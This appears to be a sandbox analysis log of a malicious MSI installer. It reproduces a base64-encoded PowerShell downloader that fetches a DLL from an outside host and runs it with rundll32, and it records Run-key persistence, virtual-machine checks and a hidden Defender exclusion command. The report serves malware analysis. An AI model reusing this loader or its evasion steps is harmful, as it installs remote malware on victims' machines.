UAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6EF35E push rbp; iretd	3_2_00007FF7AF6EF35F
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6EE1E2 push rbp; iretd	3_2_00007FF7AF6EE1E3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF8160503CA pushad ; iretd	4_2_00007FF8160503CB

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48BD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI49E8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4B9F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI494B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5344.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4755.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_074112c558cd4b6f62f9637e863e9916			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_074112c558cd4b6f62f9637e863e9916			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5984	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1604	Thread sleep time: -109000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5304	Thread sleep time: -109000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 492	Thread sleep time: -109000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5960	Thread sleep count: 38 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5960	Thread sleep time: -190000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\Installer\MSI5344.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_3-18831
Source: C:\Windows\SysWOW64\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_7-4363

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI48BD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI4B9F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI494B.tmp	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 109000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 109000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 109000

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_7-4268
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_7-4588
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node

Source: 4641a8.msi.1.dr	Binary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: powershell.exe, 00000004.00000002.381153718.0000011A283F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.846728997.00000000035CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF7090A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF7AF7090A4
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF70F3F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF7AF70F3F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04A03660 GetComputerNameA,lstrcmpiA,lstrcmpiA,GetUserNameA,lstrcmpiA,SetErrorMode,SetUnhandledExceptionFilter,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,CharLowerA,lstrcpyA,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,GetEnvironmentVariableA,SetEnvironmentVariableA,wsprintfA,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,OpenProcess,TerminateProcess,Sleep,CloseHandle,GetCurrentProcessId,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,inet_addr,CreateThread,WaitForSingleObject,ExitThread,	7_2_04A03660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FC3660 GetComputerNameA,lstrcmpiA,lstrcmpiA,GetUserNameA,lstrcmpiA,SetErrorMode,SetUnhandledExceptionFilter,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,CharLowerA,lstrcpyA,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,GetEnvironmentVariableA,SetEnvironmentVariableA,wsprintfA,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,OpenProcess,TerminateProcess,Sleep,CloseHandle,GetCurrentProcessId,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,inet_addr,CreateThread,WaitForSingleObject,ExitThread,	9_2_00FC3660

Source: rundll32.exe, 00000007.00000002.380387384.0000000004A15000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 0Eroot\SecurityCenter2root\SecurityCenterWQLSelect * From AntiVirusProductdisplayName%PROGRAMDATA%\Defaultrundll32.exe "",#1m_svc /sysWinsta0\Defaultopenrunaspowershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "explorer.exe %LOCALAPPDATA%LocalLow\Chrome_RenderWidgetHostHWNDDirectUIHWNDClient CaptionSIBBarHostDesktopProgramsMFUMoreProgramsPaneDesktop More Programs PaneNamespaceTreeControl#32768NetUIHWNDSysTreeView32SysListView32Button#32770EditComboBoxComboBoxEx32DUIViewWndClassNameFloatNotifySinkProgmanProgram ManagerSHELLDLL_DefViewFolderViewShell_TrayWndReBarWindow32MSTaskSwWClassMSTaskListWClassSIBJumpViewDV2ControlHostDesktopDestinationList\explorer.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Run39f848a1" /c () > "" 2>&1%08lx
